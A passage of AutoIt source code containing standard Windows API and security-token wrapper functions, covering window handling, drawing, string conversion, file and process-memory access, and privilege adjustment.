	Return SetExtended($aresult[0], $aresult[3])
EndFunc

Func _winapi_localfree($hmem)
	Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_loword($ilong)
	Return BitAND($ilong, 65535)
EndFunc

Func _winapi_makelangid($lgidprimary, $lgidsub)
	Return BitOR(BitShift($lgidsub, -10), $lgidprimary)
EndFunc

Func _winapi_makelcid($lgid, $srtid)
	Return BitOR(BitShift($srtid, -16), $lgid)
EndFunc

Func _winapi_makelong($ilo, $ihi)
	Return BitOR(BitShift($ihi, -16), BitAND($ilo, 65535))
EndFunc

Func _winapi_makeqword($lodword, $hidword)
	Local $tint64 = DllStructCreate("uint64")
	Local $tdwords = DllStructCreate("dword;dword", DllStructGetPtr($tint64))
	DllStructSetData($tdwords, 1, $lodword)
	DllStructSetData($tdwords, 2, $hidword)
	Return DllStructGetData($tint64, 1)
EndFunc

Func _winapi_messagebeep($itype = 1)
	Local $isound
	Switch $itype
		Case 1
			$isound = 0
		Case 2
			$isound = 16
		Case 3
			$isound = 32
		Case 4
			$isound = 48
		Case 5
			$isound = 64
		Case Else
			$isound = -1
	EndSwitch
	Local $aresult = DllCall("user32.dll", "bool", "MessageBeep", "uint", $isound)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_msgbox($iflags, $stitle, $stext)
	BlockInput(0)
	MsgBox($iflags, $stitle, $stext & "   ")
EndFunc

Func _winapi_mouse_event($iflags, $ix = 0, $iy = 0, $idata = 0, $iextrainfo = 0)
	DllCall("user32.dll", "none", "mouse_event", "dword", $iflags, "dword", $ix, "dword", $iy, "dword", $idata, "ulong_ptr", $iextrainfo)
	If @error Then Return SetError(@error, @extended)
EndFunc

Func _winapi_moveto($hdc, $ix, $iy)
	Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_movewindow($hwnd, $ix, $iy, $iwidth, $iheight, $frepaint = True)
	Local $aresult = DllCall("user32.dll", "bool", "MoveWindow", "hwnd", $hwnd, "int", $ix, "int", $iy, "int", $iwidth, "int", $iheight, "bool", $frepaint)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_muldiv($inumber, $inumerator, $idenominator)
	Local $aresult = DllCall("kernel32.dll", "int", "MulDiv", "int", $inumber, "int", $inumerator, "int", $idenominator)
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_multibytetowidechar($stext, $icodepage = 0, $iflags = 0, $bretstring = False)
	Local $stexttype = "str"
	If NOT IsString($stext) Then $stexttype = "struct*"
	Local $aresult = DllCall("kernel32.dll", "int", "MultiByteToWideChar", "uint", $icodepage, "dword", $iflags, $stexttype, $stext, "int", -1, "ptr", 0, "int", 0)
	If @error Then Return SetError(@error, @extended, 0)
	Local $iout = $aresult[0]
	Local $tout = DllStructCreate("wchar[" & $iout & "]")
	$aresult = DllCall("kernel32.dll", "int", "MultiByteToWideChar", "uint", $icodepage, "dword", $iflags, $stexttype, $stext, "int", -1, "struct*", $tout, "int", $iout)
	If @error Then Return SetError(@error, @extended, 0)
	If $bretstring Then Return DllStructGetData($tout, 1)
	Return $tout
EndFunc

Func _winapi_multibytetowidecharex($stext, $ptext, $icodepage = 0, $iflags = 0)
	Local $aresult = DllCall("kernel32.dll", "int", "MultiByteToWideChar", "uint", $icodepage, "dword", $iflags, "STR", $stext, "int", -1, "struct*", $ptext, "int", (StringLen($stext) + 1) * 2)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_openprocess($iaccess, $finherit, $iprocessid, $fdebugpriv = False)
	Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
	If @error Then Return SetError(@error, @extended, 0)
	If $aresult[0] Then Return $aresult[0]
	If NOT $fdebugpriv Then Return 0
	Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
	If @error Then Return SetError(@error, @extended, 0)
	_security__setprivilege($htoken, "SeDebugPrivilege", True)
	Local $ierror = @error
	Local $ilasterror = @extended
	Local $iret = 0
	If NOT @error Then
		$aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
		$ierror = @error
		$ilasterror = @extended
		If $aresult[0] Then $iret = $aresult[0]
		_security__setprivilege($htoken, "SeDebugPrivilege", False)
		If @error Then
			$ierror = @error
			$ilasterror = @extended
		EndIf
	EndIf
	_winapi_closehandle($htoken)
	Return SetError($ierror, $ilasterror, $iret)
EndFunc

Func __winapi_parsefiledialogpath($spath)
	Local $afiles[3]
	$afiles[0] = 2
	Local $stemp = StringMid($spath, 1, StringInStr($spath, "\", 0, -1) - 1)
	$afiles[1] = $stemp
	$afiles[2] = StringMid($spath, StringInStr($spath, "\", 0, -1) + 1)
	Return $afiles
EndFunc

Func _winapi_pathfindonpath(Const $szfile, $aextrapaths = "", Const $szpathdelimiter = @LF)
	Local $iextracount = 0
	If IsString($aextrapaths) Then
		If StringLen($aextrapaths) Then
			$aextrapaths = StringSplit($aextrapaths, $szpathdelimiter, 1 + 2)
			$iextracount = UBound($aextrapaths, 1)
		EndIf
	ElseIf IsArray($aextrapaths) Then
		$iextracount = UBound($aextrapaths)
	EndIf
	Local $tpaths, $tpathptrs
	If $iextracount Then
		Local $szstruct = ""
		For $path In $aextrapaths
			$szstruct &= "wchar[" & StringLen($path) + 1 & "];"
		Next
		$tpaths = DllStructCreate($szstruct)
		$tpathptrs = DllStructCreate("ptr[" & $iextracount + 1 & "]")
		For $i = 1 To $iextracount
			DllStructSetData($tpaths, $i, $aextrapaths[$i - 1])
			DllStructSetData($tpathptrs, 1, DllStructGetPtr($tpaths, $i), $i)
		Next
		DllStructSetData($tpathptrs, 1, Ptr(0), $iextracount + 1)
	EndIf
	Local $aresult = DllCall("shlwapi.dll", "bool", "PathFindOnPathW", "wstr", $szfile, "struct*", $tpathptrs)
	If @error Then Return SetError(@error, @extended, False)
	If $aresult[0] = 0 Then Return SetError(1, 0, $szfile)
	Return $aresult[1]
EndFunc

Func _winapi_pointfromrect(ByRef $trect, $fcenter = True)
	Local $ix1 = DllStructGetData($trect, "Left")
	Local $iy1 = DllStructGetData($trect, "Top")
	Local $ix2 = DllStructGetData($trect, "Right")
	Local $iy2 = DllStructGetData($trect, "Bottom")
	If $fcenter Then
		$ix1 = $ix1 + (($ix2 - $ix1) / 2)
		$iy1 = $iy1 + (($iy2 - $iy1) / 2)
	EndIf
	Local $tpoint = DllStructCreate($tagpoint)
	DllStructSetData($tpoint, "X", $ix1)
	DllStructSetData($tpoint, "Y", $iy1)
	Return $tpoint
EndFunc

Func _winapi_postmessage($hwnd, $imsg, $iwparam, $ilparam)
	Local $aresult = DllCall("user32.dll", "bool", "PostMessage", "hwnd", $hwnd, "uint", $imsg, "wparam", $iwparam, "lparam", $ilparam)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_primarylangid($lgid)
	Return BitAND($lgid, 1023)
EndFunc

Func _winapi_ptinrect(ByRef $trect, ByRef $tpoint)
	Local $aresult = DllCall("user32.dll", "bool", "PtInRect", "struct*", $trect, "struct", $tpoint)
	If @error Then Return SetError(1, @extended, False)
	Return NOT ($aresult[0] = 0)
EndFunc

Func _winapi_readfile($hfile, $pbuffer, $itoread, ByRef $iread, $poverlapped = 0)
	Local $aresult = DllCall("kernel32.dll", "bool", "ReadFile", "handle", $hfile, "ptr", $pbuffer, "dword", $itoread, "dword*", 0, "ptr", $poverlapped)
	If @error Then Return SetError(@error, @extended, False)
	$iread = $aresult[4]
	Return $aresult[0]
EndFunc

Func _winapi_readprocessmemory($hprocess, $pbaseaddress, $pbuffer, $isize, ByRef $iread)
	Local $aresult = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "handle", $hprocess, "ptr", $pbaseaddress, "ptr", $pbuffer, "ulong_ptr", $isize, "ulong_ptr*", 0)
	If @error Then Return SetError(@error, @extended, False)
	$iread = $aresult[5]
	Return $aresult[0]
EndFunc

Func _winapi_rectisempty(ByRef $trect)
	Return (DllStructGetData($trect, "Left") = 0) AND (DllStructGetData($trect, "Top") = 0) AND (DllStructGetData($trect, "Right") = 0) AND (DllStructGetData($trect, "Bottom") = 0)
EndFunc

Func _winapi_redrawwindow($hwnd, $trect = 0, $hregion = 0, $iflags = 5)
	Local $aresult = DllCall("user32.dll", "bool", "RedrawWindow", "hwnd", $hwnd, "struct*", $trect, "handle", $hregion, "uint", $iflags)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_registerwindowmessage($smessage)
	Local $aresult = DllCall("user32.dll", "uint", "RegisterWindowMessageW", "wstr", $smessage)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_releasecapture()
	Local $aresult = DllCall("user32.dll", "bool", "ReleaseCapture")
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_releasedc($hwnd, $hdc)
	Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_screentoclient($hwnd, ByRef $tpoint)
	Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_selectobject($hdc, $hgdiobj)
	Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setbkcolor($hdc, $icolor)
	Local $aresult = DllCall("gdi32.dll", "INT", "SetBkColor", "handle", $hdc, "dword", $icolor)
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_setbkmode($hdc, $ibkmode)
	Local $aresult = DllCall("gdi32.dll", "int", "SetBkMode", "handle", $hdc, "int", $ibkmode)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_setcapture($hwnd)
	Local $aresult = DllCall("user32.dll", "hwnd", "SetCapture", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_setcursor($hcursor)
	Local $aresult = DllCall("user32.dll", "handle", "SetCursor", "handle", $hcursor)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_setdefaultprinter($sprinter)
	Local $aresult = DllCall("winspool.drv", "bool", "SetDefaultPrinterW", "wstr", $sprinter)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setdibits($hdc, $hbmp, $istartscan, $iscanlines, $pbits, $pbmi, $icoloruse = 0)
	Local $aresult = DllCall("gdi32.dll", "int", "SetDIBits", "handle", $hdc, "handle", $hbmp, "uint", $istartscan, "uint", $iscanlines, "ptr", $pbits, "ptr", $pbmi, "uint", $icoloruse)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setendoffile($hfile)
	Local $aresult = DllCall("kernel32.dll", "bool", "SetEndOfFile", "handle", $hfile)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setevent($hevent)
	Local $aresult = DllCall("kernel32.dll", "bool", "SetEvent", "handle", $hevent)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setfilepointer($hfile, $ipos, $imethod = 0)
	Local $aresult = DllCall("kernel32.dll", "INT", "SetFilePointer", "handle", $hfile, "long", $ipos, "ptr", 0, "long", $imethod)
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_setfocus($hwnd)
	Local $aresult = DllCall("user32.dll", "hwnd", "SetFocus", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_setfont($hwnd, $hfont, $fredraw = True)
	_sendmessage($hwnd, $__winapiconstant_wm_setfont, $hfont, $fredraw, 0, "hwnd")
EndFunc

Func _winapi_sethandleinformation($hobject, $imask, $iflags)
	Local $aresult = DllCall("kernel32.dll", "bool", "SetHandleInformation", "handle", $hobject, "dword", $imask, "dword", $iflags)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setlayeredwindowattributes($hwnd, $i_transcolor, $transparency = 255, $dwflags = 3, $iscolorref = False)
	If $dwflags = Default OR $dwflags = "" OR $dwflags < 0 Then $dwflags = 3
	If NOT $iscolorref Then
		$i_transcolor = Int(BinaryMid($i_transcolor, 3, 1) & BinaryMid($i_transcolor, 2, 1) & BinaryMid($i_transcolor, 1, 1))
	EndIf
	Local $aresult = DllCall("user32.dll", "bool", "SetLayeredWindowAttributes", "hwnd", $hwnd, "dword", $i_transcolor, "byte", $transparency, "dword", $dwflags)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setparent($hwndchild, $hwndparent)
	Local $aresult = DllCall("user32.dll", "hwnd", "SetParent", "hwnd", $hwndchild, "hwnd", $hwndparent)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_setprocessaffinitymask($hprocess, $imask)
	Local $aresult = DllCall("kernel32.dll", "bool", "SetProcessAffinityMask", "handle", $hprocess, "ulong_ptr", $imask)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setsyscolors($velements, $vcolors)
	Local $isearray = IsArray($velements), $iscarray = IsArray($vcolors)
	Local $ielementnum
	If NOT $iscarray AND NOT $isearray Then
		$ielementnum = 1
	ElseIf $iscarray OR $isearray Then
		If NOT $iscarray OR NOT $isearray Then Return SetError(-1, -1, False)
		If UBound($velements) <> UBound($vcolors) Then Return SetError(-1, -1, False)
		$ielementnum = UBound($velements)
	EndIf
	Local $telements = DllStructCreate("int Element[" & $ielementnum & "]")
	Local $tcolors = DllStructCreate("dword NewColor[" & $ielementnum & "]")
	If NOT $isearray Then
		DllStructSetData($telements, "Element", $velements, 1)
	Else
		For $x = 0 To $ielementnum - 1
			DllStructSetData($telements, "Element", $velements[$x], $x + 1)
		Next
	EndIf
	If NOT $iscarray Then
		DllStructSetData($tcolors, "NewColor", $vcolors, 1)
	Else
		For $x = 0 To $ielementnum - 1
			DllStructSetData($tcolors, "NewColor", $vcolors[$x], $x + 1)
		Next
	EndIf
	Local $aresult = DllCall("user32.dll", "bool", "SetSysColors", "int", $ielementnum, "struct*", $telements, "struct*", $tcolors)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_settextcolor($hdc, $icolor)
	Local $aresult = DllCall("gdi32.dll", "INT", "SetTextColor", "handle", $hdc, "dword", $icolor)
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_setwindowlong($hwnd, $iindex, $ivalue)
	_winapi_setlasterror(0)
	Local $sfuncname = "SetWindowLongW"
	If @AutoItX64 Then $sfuncname = "SetWindowLongPtrW"
	Local $aresult = DllCall("user32.dll", "long_ptr", $sfuncname, "hwnd", $hwnd, "int", $iindex, "long_ptr", $ivalue)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_setwindowplacement($hwnd, $pwindowplacement)
	Local $aresult = DllCall("user32.dll", "bool", "SetWindowPlacement", "hwnd", $hwnd, "ptr", $pwindowplacement)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setwindowpos($hwnd, $hafter, $ix, $iy, $icx, $icy, $iflags)
	Local $aresult = DllCall("user32.dll", "bool", "SetWindowPos", "hwnd", $hwnd, "hwnd", $hafter, "int", $ix, "int", $iy, "int", $icx, "int", $icy, "uint", $iflags)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setwindowrgn($hwnd, $hrgn, $bredraw = True)
	Local $aresult = DllCall("user32.dll", "int", "SetWindowRgn", "hwnd", $hwnd, "handle", $hrgn, "bool", $bredraw)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_setwindowshookex($idhook, $lpfn, $hmod, $dwthreadid = 0)
	Local $aresult = DllCall("user32.dll", "handle", "SetWindowsHookEx", "int", $idhook, "ptr", $lpfn, "handle", $hmod, "dword", $dwthreadid)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_setwindowtext($hwnd, $stext)
	Local $aresult = DllCall("user32.dll", "bool", "SetWindowTextW", "hwnd", $hwnd, "wstr", $stext)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_showcursor($fshow)
	Local $aresult = DllCall("user32.dll", "int", "ShowCursor", "bool", $fshow)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_showerror($stext, $fexit = True)
	_winapi_msgbox(266256, "Error", $stext)
	If $fexit Then Exit 
EndFunc

Func _winapi_showmsg($stext)
	_winapi_msgbox(64 + 4096, "Information", $stext)
EndFunc

Func _winapi_showwindow($hwnd, $icmdshow = 5)
	Local $aresult = DllCall("user32.dll", "bool", "ShowWindow", "hwnd", $hwnd, "int", $icmdshow)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_stringfromguid($pguid)
	Local $aresult = DllCall("ole32.dll", "int", "StringFromGUID2", "struct*", $pguid, "wstr", "", "int", 40)
	If @error Then Return SetError(@error, @extended, "")
	Return SetExtended($aresult[0], $aresult[2])
EndFunc

Func _winapi_stringlena($vstring)
	Local $acall = DllCall("kernel32.dll", "int", "lstrlenA", "struct*", $vstring)
	If @error Then Return SetError(1, @extended, 0)
	Return $acall[0]
EndFunc

Func _winapi_stringlenw($vstring)
	Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $vstring)
	If @error Then Return SetError(1, @extended, 0)
	Return $acall[0]
EndFunc

Func _winapi_sublangid($lgid)
	Return BitShift($lgid, 10)
EndFunc

Func _winapi_systemparametersinfo($iaction, $iparam = 0, $vparam = 0, $iwinini = 0)
	Local $aresult = DllCall("user32.dll", "bool", "SystemParametersInfoW", "uint", $iaction, "uint", $iparam, "ptr", $vparam, "uint", $iwinini)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_twipsperpixelx()
	Local $lngdc, $twipsperpixelx
	$lngdc = _winapi_getdc(0)
	$twipsperpixelx = 1440 / _winapi_getdevicecaps($lngdc, $__winapiconstant_logpixelsx)
	_winapi_releasedc(0, $lngdc)
	Return $twipsperpixelx
EndFunc

Func _winapi_twipsperpixely()
	Local $lngdc, $twipsperpixely
	$lngdc = _winapi_getdc(0)
	$twipsperpixely = 1440 / _winapi_getdevicecaps($lngdc, $__winapiconstant_logpixelsy)
	_winapi_releasedc(0, $lngdc)
	Return $twipsperpixely
EndFunc

Func _winapi_unhookwindowshookex($hhk)
	Local $aresult = DllCall("user32.dll", "bool", "UnhookWindowsHookEx", "handle", $hhk)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_updatelayeredwindow($hwnd, $hdcdest, $pptdest, $psize, $hdcsrce, $pptsrce, $irgb, $pblend, $iflags)
	Local $aresult = DllCall("user32.dll", "bool", "UpdateLayeredWindow", "hwnd", $hwnd, "handle", $hdcdest, "ptr", $pptdest, "ptr", $psize, "handle", $hdcsrce, "ptr", $pptsrce, "dword", $irgb, "ptr", $pblend, "dword", $iflags)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_updatewindow($hwnd)
	Local $aresult = DllCall("user32.dll", "bool", "UpdateWindow", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_waitforinputidle($hprocess, $itimeout = -1)
	Local $aresult = DllCall("user32.dll", "dword", "WaitForInputIdle", "handle", $hprocess, "dword", $itimeout)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_waitformultipleobjects($icount, $phandles, $fwaitall = False, $itimeout = -1)
	Local $aresult = DllCall("kernel32.dll", "INT", "WaitForMultipleObjects", "dword", $icount, "ptr", $phandles, "bool", $fwaitall, "dword", $itimeout)
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_waitforsingleobject($hhandle, $itimeout = -1)
	Local $aresult = DllCall("kernel32.dll", "INT", "WaitForSingleObject", "handle", $hhandle, "dword", $itimeout)
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_widechartomultibyte($punicode, $icodepage = 0, $bretstring = True)
	Local $sunicodetype = "wstr"
	If NOT IsString($punicode) Then $sunicodetype = "struct*"
	Local $aresult = DllCall("kernel32.dll", "int", "WideCharToMultiByte", "uint", $icodepage, "dword", 0, $sunicodetype, $punicode, "int", -1, "ptr", 0, "int", 0, "ptr", 0, "ptr", 0)
	If @error Then Return SetError(@error, @extended, "")
	Local $tmultibyte = DllStructCreate("char[" & $aresult[0] & "]")
	$aresult = DllCall("kernel32.dll", "int", "WideCharToMultiByte", "uint", $icodepage, "dword", 0, $sunicodetype, $punicode, "int", -1, "struct*", $tmultibyte, "int", $aresult[0], "ptr", 0, "ptr", 0)
	If @error Then Return SetError(@error, @extended, "")
	If $bretstring Then Return DllStructGetData($tmultibyte, 1)
	Return $tmultibyte
EndFunc

Func _winapi_windowfrompoint(ByRef $tpoint)
	Local $aresult = DllCall("user32.dll", "hwnd", "WindowFromPoint", "struct", $tpoint)
	If @error Then Return SetError(1, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_writeconsole($hconsole, $stext)
	Local $aresult = DllCall("kernel32.dll", "bool", "WriteConsoleW", "handle", $hconsole, "wstr", $stext, "dword", StringLen($stext), "dword*", 0, "ptr", 0)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_writefile($hfile, $pbuffer, $itowrite, ByRef $iwritten, $poverlapped = 0)
	Local $aresult = DllCall("kernel32.dll", "bool", "WriteFile", "handle", $hfile, "ptr", $pbuffer, "dword", $itowrite, "dword*", 0, "ptr", $poverlapped)
	If @error Then Return SetError(@error, @extended, False)
	$iwritten = $aresult[4]
	Return $aresult[0]
EndFunc

Func _winapi_writeprocessmemory($hprocess, $pbaseaddress, $pbuffer, $isize, ByRef $iwritten, $sbuffer = "ptr")
	Local $aresult = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $hprocess, "ptr", $pbaseaddress, $sbuffer, $pbuffer, "ulong_ptr", $isize, "ulong_ptr*", 0)
	If @error Then Return SetError(@error, @extended, False)
	$iwritten = $aresult[5]
	Return $aresult[0]
EndFunc

Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0)
	Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired)
	If @error Then Return SetError(1, @extended, False)
	Return NOT ($acall[0] = 0)
EndFunc

Func _security__createprocesswithtoken($htoken, $ilogonflags, $scommandline, $icreationflags, $scurdir, $tstartupinfo, $tprocess_information)
	Local $acall = DllCall("advapi32.dll", "bool", "CreateProcessWithTokenW", "handle", $htoken, "dword", $ilogonflags, "ptr", 0, "wstr", $scommandline, "dword", $icreationflags, "struct*", 0, "wstr", $scurdir, "struct*", $tstartupinfo, "struct*", $tprocess_information)
	If @error OR NOT $acall[0] Then Return SetError(1, @extended, False)
	Return True
EndFunc

Func _security__duplicatetokenex($hexistingtoken, $idesiredaccess, $iimpersonationlevel, $itokentype)
	Local $acall = DllCall("advapi32.dll", "bool", "DuplicateTokenEx", "handle", $hexistingtoken, "dword", $idesiredaccess, "struct*", 0, "int", $iimpersonationlevel, "int", $itokentype, "handle*", 0)
	If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
	Return $acall[6]
EndFunc

Func _security__getaccountsid($saccount, $ssystem = "")
	Local $aacct = _security__lookupaccountname($saccount, $ssystem)
	If @error Then Return SetError(@error, @extended, 0)
	If IsArray($aacct) Then Return _security__stringsidtosid($aacct[0])
	Return ""
EndFunc

Func _security__getlengthsid($psid)
	If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0)
	Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid)
	If @error Then Return SetError(2, @extended, 0)
	Return $acall[0]
EndFunc

Func _security__gettokeninformation($htoken, $iclass)
	Local $acall = DllCall("advapi32.dll", "bool", "GetTokenInformation", "handle", $htoken, "int", $iclass, "struct*", 0, "dword", 0, "dword*", 0)
	If @error OR NOT $acall[5] Then Return SetError(1, @extended, 0)
	Local $ilen = $acall[5]
	Local $tbuffer = DllStructCreate("byte[" & $ilen & "]")
	$acall = DllCall("advapi32.dll", "bool", "GetTokenInformation", "handle", $htoken, "int", $iclass, "struct*", $tbuffer, "dword", DllStructGetSize($tbuffer), "dword*", 0)
	If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
	Return $tbuffer
EndFunc

Func _security__impersonateself($ilevel = $securityimpersonation)
	Local $acall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $ilevel)
	If @error Then Return SetError(1, @extended, False)
	Return NOT ($acall[0] = 0)
EndFunc

Func _security__isvalidsid($psid)
	Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid)
	If @error Then Return SetError(1, @extended, False)
	Return NOT ($acall[0] = 0)
EndFunc

Func _security__lookupaccountname($saccount, $ssystem = "")
	Local $tdata = DllStructCreate("byte SID[256]")
	Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0)
	If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
	Local $aacct[3]
	$aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID"))
	$aacct[1] = $acall[5]
	$aacct[2] = $acall[7]
	Return $aacct
EndFunc

Func _security__lookupaccountsid($vsid, $ssystem = "")
	Local $psid, $aacct[3]
	If IsString($vsid) Then
		$psid = _security__stringsidtosid($vsid)
	Else
		$psid = $vsid
	EndIf
	If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0)
	Local $typesystem = "ptr"
	If $ssystem Then $typesystem = "wstr"
	Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountSidW", $typesystem, $ssystem, "struct*", $psid, "wstr", "", "dword*", 65536, "wstr", "", "dword*", 65536, "int*", 0)
	If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
	Local $aacct[3]
	$aacct[0] = $acall[3]
	$aacct[1] = $acall[5]
	$aacct[2] = $acall[7]
	Return $aacct
EndFunc

Func _security__lookupprivilegevalue($ssystem, $sname)
	Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0)
	If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
	Return $acall[3]
EndFunc

Func _security__openprocesstoken($hprocess, $iaccess)
	Local $acall = DllCall("advapi32.dll", "bool", "OpenProcessToken", "handle", $hprocess, "dword", $iaccess, "handle*", 0)
	If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
	Return $acall[3]
EndFunc

Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False)
	If $hthread = 0 Then $hthread = _winapi_getcurrentthread()
	If @error Then Return SetError(1, @extended, 0)
	Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0)
	If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
	Return $acall[4]
EndFunc

Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False)
	Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
	If $htoken = 0 Then
		If _winapi_getlasterror() <> $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0)
		If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0)
		$htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
		If $htoken = 0 Then Return SetError(2, _winapi_getlasterror(), 0)
	EndIf
	Return $htoken
EndFunc

Func _security__setprivilege($htoken, $sprivilege, $fenable)
	Local $iluid = _security__lookupprivilegevalue("", $sprivilege)
	If $iluid = 0 Then Return SetError(1, @extended, False)
	Local $tcurrstate = DllStructCreate($tagtoken_privileges)
	Local $icurrstate = DllStructGetSize($tcurrstate)
	Local $tprevstate = DllStructCreate($tagtoken_privileges)
	Local $iprevstate = DllStructGetSize($tprevstate)
	Local $trequired = DllStructCreate("int Data")
	DllStructSetData($tcurrstate, "Count", 1)
	DllStructSetData($tcurrstate, "LUID", $iluid)
	If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False)
	DllStructSetData($tprevstate, "Count", 1)
	DllStructSetData($tprevstate, "LUID", $iluid)
